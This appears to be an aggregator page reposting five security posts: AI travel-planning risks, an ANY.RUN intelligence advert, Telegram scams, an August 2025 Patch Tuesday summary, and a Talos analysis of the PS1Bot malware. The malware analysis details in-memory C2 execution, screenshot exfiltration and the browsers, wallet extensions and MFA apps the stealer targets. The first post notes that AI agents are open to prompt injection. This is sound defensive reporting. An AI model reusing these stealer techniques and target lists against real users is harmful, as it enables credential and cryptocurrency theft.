Artificial intelligence is already trying its hand as a travel agent: just ask a chatbot about your chosen destination, and in a couple of seconds you’ll get a full sightseeing itinerary, a list of hotels with good reviews, and even visa tips. And with the help of an AI agent, you can even buy tickets without having to trawl through endless airline websites and flight aggregators. Sounds like a traveler’s dream, but there are downsides. In this post, we look at what to pay attention to when planning a vacation with ChatGPT or another AI assistant.
What could go wrong?
A Kaspersky study reveals that just 28% of AI users trust artificial intelligence to plan their vacations, (with 96% of that 28% being satisfied with such AI assistance). Note that chatbots possess no knowledge of their own, but learn from input texts and data, and then formulate the most fitting answer to a question. And AI isn’t immune to serving up inaccurate, outdated, or downright false information. Sure, some chatbots already have an internet search function built in, but infallible fact-checking is still a long way off.
In March 2025, Mark Pollard of Australia was due to fly to Chile to give a lecture. But he was turned away at the check-in desk for not having a visa. Mark had duly consulted ChatGPT about the visa requirements of various Latin American countries, and had blindly trusted its response. As of 2019, however, Australian citizens need a visa to visit Chile, but this information was apparently unknown to the neural network. In another case, AI advised a journalist to visit museums that had been wiped out by a forest fire.
Sometimes, even professionals on duty are led astray by bad AI. In 2024, staff at Manila airport tried to stop a passenger boarding a UK-bound flight: she was a UK citizen, but only had her US passport on her at the time. As it turns out, that isn’t grounds to deny boarding a flight to England, but the staff had been misinformed by Google AI Overviews. It took a call to the embassy to resolve the situation.
If you don’t want AI to send you to a closed restaurant or a non-existent landmark, then check the information in real time. Just be aware — and beware — that connecting to public Wi-Fi is always a gamble, with the security of your devices and data at stake. When abroad, it’s much safer to use mobile internet. There’s no need to buy a physical SIM card — just use an eSIM.
Why you shouldn’t share personal data with AI
Most popular Ais, like ChatGPT and Gemini, process and store all user requests. Which means that in the event of a bug or major leak, outsiders could find out too much about you: travel dates, schedule, budget, and traveling companions. So only share with neural networks data that you wouldn’t mind the whole world knowing.
Many companies these days offer AI agents — digital assistants that can autonomously perform tasks on your behalf. For example, you can ask an AI agent to book a tour, and email your colleagues about your upcoming vacation (please don’t give AI agents access to work chats and email!). Once instructed, the AI agent either launches a virtual machine or captures your computer screen and connects to third-party services.
The problem is that you risk giving the neural network not only your personal data, but also the freedom to perform unwanted actions on websites. Recall that AI agents are vulnerable to prompt injection attacks — hidden commands that attackers plant on phishing pages and hacked websites. Spotting these on your own is near impossible: prompt injections are usually embedded in a website’s metadata or visual elements.
For now at least, the safest way to plan vacation travel is to do your own research and buy everything you need yourself — using AI only as an auxiliary tool. And to minimize the risks associated with prompt injections, use a reliable security solution that blocks all attempts to infect your device with malware.
Always double-check information supplied by AI — a manual search is always best.
Be careful with AI agents: they’re prone to prompt injections, and may leak your data to attackers — or worse.
Bear in mind that public Wi-Fi in airports, hotels, and cafes isn’t secure: traffic isn’t protected, and attackers can snoop on your data. When on the road, it’s better to use an eSIM for mobile internet.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-14 10:06:562025-08-14 10:06:56How AI can help plan your vacation | Kaspersky official blog
As we highlighted in our article on building threat resilience in enterprises, one of the key challenges that stand before CISOs is ensuring proactive security. Reacting to incidents is no longer enough; you need to anticipate upcoming threats.
To achieve this, your team needs powerful solutions that meet your criteria and deliver fast results. Explore our step-by-step guide on integrating threat intelligence into your workflow with ANY.RUN’s TI Lookup and TI Feeds, solutions trusted by 15,000+ organizations across diverse industries.
Find a Source for Intel That Fits Your SOC
TI Feeds are filtered to remove false positives and updated every two hours, ensuring fresh, extensive, and trustworthy data
Threat intelligence is a crucial component of modern SOC operations. Implementing it increases threat detection rates, speeds up incident response, and strengthens overall defense against emerging threats.
When choosing a threat intel solution, prioritize reliability of data, rich context that comes with indicators, and constant updates that will keep you on top of things.
Being an enterprise-grade service, Threat Intelligence Feedsmeets these standards. It delivers fast, fresh intelligence gained from threat investigations by 15,000 SOC teams. Each indicator, be that IP, domain, or URL, is linked to ANY.RUN’s Interactive Sandbox analysis of malware, enabling you to observe its impact, activities, and overall context in one click.
Not only SOC teams, but also MSSPs and DFIR specialists can use TI Feeds to improve their workflow
Enrich your SIEM, TIP, or XDR system with TI Feeds for:
Expanded Coverage: ANY.RUN’s exclusive IOCs come from Memory Dumps, Suricata IDS, in-browser data, and internal threat categorization systems, increasing the chance of detection of the most evasive threats.
Reduced Workload: The indicators are pre-processed to avoid false positives and ready to be used for malware analysis or incident investigation.
Informed Response: Rich metadata provided for IOCs gives you the context for in-depth threat investigations and faster response.
Create compound queries to retrieve data you need in ANY.RUN’s TI Lookup
Steady monitoring and expanded threat coverage provided by solutions like TI Feeds are important for maintaining a robust defense system. The next challenge is finding a way to browse, identify, and enrich indicators quickly.
In other words, you need targeted, fast access to threat intelligence, for both proactive threat hunting and swift incident response. That’s just what Threat Intelligence Lookup provides. For analysts, it’s like a fishing rod with which they can catch exactly what they’re looking for in the sea of extensive data on threats: for example, quick verdicts on suspicious IPs or additional info on malicious indicators.
Equipping your team with TI Lookup means that your SOC will reach:
Faster Triage and Data-Fueled Response: Check any indicator in seconds, identify malicious activity, and enriched it with more info.
Higher Expertise Levels: Your team members can explore actual attacks, see how they unfold and what TTPs are in use, gaining insights into modern malware.
Improved Proactive Defense: Use intel to develop new develop SIEM, IDS/IPS, or EDR rules for acting in advance.
Even the free version of TI Lookup makes it possible to achieve these results.
Enrich IOCs with live attack data from threat analyses across 15K SOCs
To conduct private analyses, gain three times more info on threats, and integrate TI Lookup into your system, choose Premium plan and:
Hunt Threats with Precision: Create and explore custom YARA rules in ANY.RUN’s database to detect malware patterns.
Reduce Risks of Breaches: Fast and accurate access to intelligence is a game-changer for alert triage and incident response, minimizing the likelihood of successful attacks.
Track Malware Trends: See Threat Intelligence Reports written by expert analysts and stay informed on latest industry-wide attacks.
As result, every stage of SOC operations will become sharper, faster, and more strategic.
Make Threat Intelligence a Part of Your Infrastructure
ANY.RUN app for IBM QRadar SOAR
For teams, it’s more effective to use flexible services available for integration, rather than standalone solutions. That’s how you create a coordinated, resource-efficient defense system.
ANY.RUN offers wide opportunities for integration, including API and SDK, as well compatibility with a majority of vendors, such as IBM QRadar, ThreatConnect, OpenCTI.
Automate Threat Monitoring: Connecting TI solutions to your SIEM, TIP, or SOAR system results in accelerated, more efficient workflow.
Expand Threat Coverage: For centralized protection, TI Feeds offer continuously updated stream of fresh intel available in STIX/TAXII and MISP.
Improved Detection Rate: Turn to TI Lookup to increase your detection capabilities, correlate indicators from over 15,000 global attacks for early detection, and enrich your threat investigations.
No Alert Overload: Reduce workload of Tier 2 and 3 specialists, empowering Tier 1 analytics to make informed decisions based on actionable and reliable threat intelligence.
Use Cases: Applying This Strategy In Real Life
Implementing threat intelligence into your security operations doesn’t mean increasing workload. It’s actually the opposite. Here are three real-world use cases explaining how quality TI solutions can address common SOC challenges.
Improving Speed and Confidence for Incident Response
The right solution can make a huge impact for your SOC team. It enables analysts to handle incidents faster and with more confidence, boosting overall efficiency.
For example, analysts can use TI Lookup for a quick check of an indicator. Enter this simple query like:
Overview of the query results in TI Lookup, indicating malicious activity
And within seconds, you’ll know that that this domain is malicious. Next step doesn’t take much either: click one of the linked analyses and you’ll see how exactly malware behaves and which processes it affects.
You can see analyses of samples that match your TI Lookup query within ANY.RUN Sandbox
And finally, block this threat—and the incident is solved. That’s how you make informed decisions effortlessly and quickly: you just need to know where to find data.
Increase Detection Rate
Another use case for TI Lookup is reviewing alert backlog data, where evasive threats might be hidden. Instead of spending time on manual research, you quickly check any suspicious fragment, such as a command line:
And you’ll find out whether it was a false alarm. In this case, it wasn’t. The command line is actually related to steganography attacks spread by AsyncRAT:
TI Lookup returns over 400 analyses of malicious samples associated with this command line
From here, go to sandbox analysis sessions to see how malware detonates, and collect data to take further informed action. As a result, an attack that could’ve remained in your systems for months is prevented.
Ensure Proactive Defense to Prevent Breaches
A key aspect of proactive defense is staying alert and continuously monitoring the threat landscape. One you know what’s going on in your industry or other sectors, you should keep an eye on malware in question, track how it evolves and what new data on it appears.
For that, use Query Updates feature in TI Lookup. Click the bell icon when doing a search to subscribe to your query. For example, if you need to access domains related to Lumma specifically, use this line:
Overview of TI Lookup results for Lumma-associated domains
Activate Query Updates:
Click Subscribe to stay alert for new results that match your query
And from now on, you’ll be notified on all new instances for proactive blocking of evolving threats.
About ANY.RUN
Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN to streamline malware investigations worldwide.
Speed up triage and response by detonating suspicious files in ANY.RUN’s Interactive Sandbox, observing malicious behavior in real time, and gathering insights for faster, more confident security decisions. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides actionable data on cyberattacks to improve detection and deepen your understanding of evolving threats.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-13 12:06:462025-08-13 12:06:46Bridging the Threat Intelligence Gap in Your SOC: A Guide for Security Leaders
Remember the early days of the internet and 419 (aka “Nigerian prince”) scams promising mountains of gold just for you? That era is thankfully over, but today a new curse is all the rage: messenger phishing. Due to its vast user base, the openness of its API, and support for crypto payments, one particular messenger — Telegram — has become a very popular choice for phishing cybercriminals. So what new tricks do Telegram scammers employ, and how can you spot them in time?
Telegram bots in the service of cybercriminals
Telegram is home to a huge array of bot-related scams. And sometimes attackers offer their bots to other bad guys to create new ones. If you’re feeling a bit overwhelmed, don’t worry: our Securelist blogpost takes a detailed look at this phenomenon — known as phishing-as-a-service.
Attackers often use Telegram bots instead of websites. It’s much easier to lure potential victims this way; it’s far harder to create and maintain a full-fledged phishing site and get victims to swallow the bait. With bots, everything’s simpler since users don’t need to leave Telegram, which many mistakenly think is a safe environment by default.
So what does it look like in practice? One example is a new scam involving cryptocurrency investments: “We’re handing out a new token to everyone — just enter the bot and go through KYC verification”. Of course, “KYC verification” for scammers doesn’t mean a passport photo or a video call to confirm your identity, but depositing a sum of cryptocurrency. And, yes, this crypto goes straight into the attackers’ account, while you get zilch.
Telegram bot offers fake KYC verification
Sure, Telegram bots aren’t limited to extracting crypto. For instance, we uncovered a scam inviting victims to get paid for watching short videos. Where? In a Telegram bot, of course.
Victims “earn” two euros per video view
Telegram bots are highly intrusive — if you don’t block them, they’ll keep knocking on your door. Most phishing sites don’t do this; user interaction with them plays out differently: visit the site, browse, leave. But chat with a Telegram bot just once, and it’ll bombard you with suspicious links or pester you for access to manage your channels and groups. If you grow tired of an intrusive bot, just block it: open a dialog with the bot, tap its name, then select Block. That done, the pesky bot will message you no more.
In another nasty bot-related scam, attackers persuade victims to start bot chats, then share their data or send money. Once the victim is hooked, the scammers rename the bot Telegram Wallet or Support Bot (mimicking supposedly official channels), transfer ownership of the bot to the victim’s account without their knowledge, and report it to Telegram support. Thinking it was the victim who created the bot, Telegram support deletes not only the bot, but also the victim’s account. The scammers do this to cover their tracks and muddy the waters for a possible police investigation.
Fake gifts and account theft
Attackers employ a variety of tricks to gain access to victims’ accounts. One of the most common scams is a “gift” subscription to Telegram Premium. Check out our post You’ve been sent a “gift” — a Telegram Premium subscription for details. In brief: scammers message victims from the hacked account of a friend, prompting them to go to a phishing site to “finalize the subscription”. There’s no subscription, of course. Instead, victims have their own accounts stolen.
Another new vector of fraud involves Telegraph, Telegram’s tool for posting longer texts. Anyone can publish content there, and no prior registration is required, which is what attackers exploit since it’s easy to redirect users to phishing pages. The result, as a rule, is one more hijacked account.
The user is lured into following the link to view the full version of the document
What else have scammers and phishers come up with? Threat actors are actively using AI to create deepfakes, steal biometric data, hide phishing attacks under temporary Blob URLs, and even spoof Google Translate subdomains. Read about these and other trends in our Securelist report.
How to guard against Telegram scams and phishing
The best tip is to apply critical thinking at all times. But even the smartest of us can sometimes act rashly, so try to read up on scams as much as possible so that your muscle memory automatically triggers the right response.
Don’t follow links sent by people you barely know. Don’t follow such links even if they promise a juicy gift, and never enter personal data on sites they point to.
Configure privacy and security in your Telegram account. See our in-depth how-to on two-factor authentication and secret chats.
Don’t share one-time codes or passwords with anyone. And don’t enter them anywhere except in the official Telegram app. Scammers know how to trick users into revealing their OTPs.
Use reliable protection that knows phishing when it sees it and warns you about it.
Block intrusive bots. As we said, they’ll keep on knocking, so if after one chat with a Telegram bot you’re sure that’s enough, feel free to block it.
Set up automatic termination of all inactive Telegram sessions every week. In Telegram, go to Settings, then select Devices → Automatically terminate sessions → If inactive for → 1 week.
If your Telegram account is already hacked, read our post What to do if your Telegram account is hacked. Time is of the essence — it’s easier to restore access in the first 24 hours after an attack. And subscribe to our Telegram channel for the inside track on new cybersecurity trends.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-13 12:06:452025-08-13 12:06:45Telegram scams in 2025 | Kaspersky official blog
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.
In this month’s release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 “critical” entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.
CVE-2025-50176 is an RCE vulnerability in DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of resource using incompatible type (‘type confusion’) in Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-50177 is an RCE vulnerability in Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where use after free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in arapid sequence over HTTP to a MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.
CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network, with an attacker successfully exploiting this vulnerability gaining SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows server 2008, Windows Server 2012, Windows Server 2026, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.
CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53766 is a remote code execution vulnerability in GDI+, a graphics Windows subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8 where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. An attacker can use an uninitialized function pointer being called when decoding a JPEG image. This can be embedded in Office and 3rd party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-49707 is a spoofing vulnerability in Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allow an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VM. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-48807 is a remote code execution vulnerability in Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may result in an attacker executing code locally in a nested guest VM to escape their VM and gain admin privileges on the guest VM that is serving as the host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VM. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”.
CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.
Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely:”
CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability
CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability,
CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2025-50168: Win32k Elevation of Privilege Vulnerability
CVE-2025-53132: Win32k Elevation of Privilege Vulnerability
CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability
CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234- 65237, 65240-65247.
The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 20:06:412025-08-12 20:06:41Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”
PS1Bot features a modular design, with several modules delivered used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.
PS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and incorporating in-memory execution techniques to facilitate execution of follow-on modules without requiring them to be written to disk.
PS1Bot distribution campaigns have been extremely active since early 2025, with new samples being observed frequently throughout the year.
The information stealer module implementation leverages wordlists embedded into the stealer to enumerate files containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the stealer also attempts to exfiltrate from infected systems.
Campaign Overview
Cisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The campaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules including an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”
This campaign has been extremely active, with new samples being observed continuously over the past several months. The cluster of malicious activity associated with this campaign also overlaps with prior reporting, including reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection chains we analyzed, the PowerShell implementation described in that reporting appears to match the components delivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2 infrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported malvertising campaigns.
Delivery
The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns:
chapter 8 medicare benefit policy manual.zip
Counting Canadian Money Worksheets Pdf.zip.e49
zebra gx430t manual.zip.081
kosher food list pdf (1).zip.c9a
pambu panchangam 2024-25 pdf.zip.a7a
Prior reporting on social media further strengthens this assessment, where researchers have observed the malvertising campaigns leading to the compressed archives delivered in this campaign.
Inside of the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader, retrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a variety of obfuscation methods throughout 2025. Below is an example of one of the more simplistic examples observed recently.
Figure 1. Deobfuscating the downloader script.
Stage 1 retrieval
When executed, the malware retrieves a JScript scriptlet from an attacker controlled server, the contents of which are then executed.
Figure 2. Example JScript scriptlet contents.
This script is responsible for performing the environmental setup needed for subsequent malware operations to function properly. This includes writing a PowerShell script to C:ProgramData (ntu.ps1 in this case) and executing the script contents written to the file created in the previous step and redacted for space in the previous screenshot. This PowerShell script obtains the serial number of the C: drive and uses it to construct a URL, which it uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious content to execute. Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed within the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each iteration.
Figure 3. PowerShell module retrieval and C2 polling.
This allows the malware to continue to run, periodically attempting to poll the attacker’s C2 server to retrieve additional commands to execute within the PowerShell process running on the system. We have observed this technique used to deliver a variety of additional modules, each enabling the attacker to conduct additional operations on the system, obtain additional environmental information about systems under their control, and enable the theft of sensitive information such as credentials, session tokens and financial account details (cryptocurrency wallet data).
PowerShell modules
We have observed the delivery of the following types of PowerShell modules during and after the initial infection process. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes that are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey information, keylogging, and screenshot capture.
Antivirus detection
Screen capture
Wallet grabber
Keylogger
Information collection
Persistence
In most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the installation and runtime status during and post-deployment. In most cases, these status updates are delivered to the C2 server in the form of URL parameters that are included as part of HTTP GET requests to the URL used to establish an initial C2 connection.
We assess with high confidence that additional modules likely exist and are deployable as desired by the adversary. The modular nature of the implementation of this malware provides flexibility and enables the rapid deployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot throughout 2025, we have observed development activities occurring over time, indicating that this is a rapidly evolving threat.
Antivirus detection
This PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting the antivirus programs present on the infected system. This is accomplished by querying Windows Management Instrumentation (WMI) to obtain a list of installed antivirus products.
Figure 4. Antivirus detection logic.
The returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the operation as URL parameters.
Figure 5. Status logging implementation.
The following is an example of the URL structure used to transmit the information to the C2 server:
Once this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until additional instructions are received. In several cases, we have observed the delivery of several distinct PowerShell scripts during the infection process. To facilitate delivery of new PowerShell scripts, we have observed that the attacker simply manipulates the response content associated with the C2 URL derived initially. Each time the infected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.
Screen capture
Once antivirus detection has been performed, we have observed the delivery of additional PowerShell modules, one of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server. This is often performed for a variety of reasons, including to identify when systems may be in active use by victims versus unattended or to collect sensitive information that may be displayed on screen but not otherwise recorded for easy exfiltration.
In this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at runtime.
Figure 6. Example use of Add-Type for C# compilation.
The resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside of the %TEMP% directory. The image is later converted and stored as a JPEG at %APPDATA%Screenshot.jpg.
Figure 7. Screenshot generation logic.
The content stored within the image file is then Base64 encoded and the resulting data is then transmitted to C2. The image files in both %TEMP% and %APPDATA% are also deleted.
Figure 8. Example HTTP POST containing Base64 encoded screenshot image file.
Additionally, status logging messages are sent to inform the attacker of the module’s progress, an example of which is shown below.
Following successful collection of screenshots on infected systems, we have observed the delivery of an additional PowerShell module that the attacker refers to as the “grabber module” that is used to steal sensitive data from infected systems. It is designed to target the following types of data that are then exfiltrated to the C2 server:
Local browser storage (stored credentials, cookies, etc.)
Browser extension data for cryptocurrency-related extensions like wallets
Local application data for cryptocurrency wallet applications
Files containing passwords, sensitive strings or wallet seed phrases
The module begins by checking the values of variables that were declared in earlier stages of the infection process. If the script is not being executed within the context of the PowerShell process established earlier, it will fail and terminate execution.
Next, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the attacker that the grabber module is running and to provide basic runtime information. Log messages are periodically transmitted during the execution of this module to provide ongoing status updates, error alerting and other relevant information throughout the execution process.
The malware first checks for the existence of various installed applications of interest, including browsers, browser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for staging.
The malware specifically checks for the existence of application data associated with the following web browsers:
Google Chrome
Chromium
Kometa
Microsoft Edge
7Star
Maxthon
Opera
Atom
Mustang
Opera GFX
AVG Secure Browser
Netbox Browser
Brave
Avast Secure Browser
Orbitum
Vivaldi
CCleaner Browser
QQ Browser
Yandex
Chedot
SalamWeb
Slimjet
Chrome Beta
Sidekick
Epic Privacy Browser
Chrome Canary
Sleipnir
Comodo Dragon
Citrio
Sputnik
CentBrowser
CoolNovo
Superbird
Naver Whale
Coowon
Swing Browser
SRWare Iron
CryptoTab Browser
Tempest
Blisk
Elements Browser
UC Browser
Torch
Iridium
Ulaa
Coc Coc
Kinza
UR Browser
Amigo
Wavebo
Viasat Browser
In addition to the previously listed browsers, the information stealer also checks for the installation of the following Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor authentication (MFA) authenticators:
MetaMask
Trezor
wallet-guard-protect-your
MetaMask-edge
Ledger
subwallet-polkadot-wallet
MetaMask-Opera
Mycelium
argent-x-starknet-wallet
Trust-Wallet
TrustWallet
bitget-wallet-formerly-bi
Atomic-Wallet
Ellipal
core-crypto-wallet-nft-ex
Binance
Dapper
braavos-starknet-wallet
Phantom
BitKeep
Kepler
Coinbase
Argent
martian-aptos-sui-wallet
Ronin
Blockchain Wallet
xverse-wallet
Exodus
cryptocom-wallet-extension
gate-wallet
Coin98
Zerion
sender-wallet
KardiaChain
Aave
desig-wallet
TerraStation
Curve
fewcha-move-wallet
Wombat
SushiSwap
kepler-edge
Harmoney
Uniswap
okx-wallet
Nami
1inch
unisat-wallet
MartianAptos
petra-aptos-wallet
xdefi-wallet
Braavos
manta-wallet
rose-wallet
XDEFI
TON
Authenticator
Yoroi
Tron
If discovered, associated extension data is staged using a process similar to that described earlier for web browser application data. The information stealer also attempts to locate locally installed cryptocurrency wallet applications and MFA applications, including the following:
Authy Desktop
Atomic
Armory
Exodus
Electrum
Bytecoin
Coinomi
Daedalus
Ethereum
Bitcoin Core
Ledger Live
Guarda
Binance
Zcash
TrustWallet
One interesting piece of functionality included with the information stealer is a scanner that is designed to identify and exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We have also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech. Additionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet seed phrase combinations.
Figure 9. Wallet seed phrase wordlist.
This wordlist is designed to be used to identify files that may contain cryptocurrency wallet seed phrases, which can be used to regain access to wallets in the case that the primary authentication method is unavailable. This is performed by iterating through the file system on local hard drives, identifying files matching specific file extensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist.
Figure 10. File scanning parameters.
It also attempts to identify files that may contain passwords.
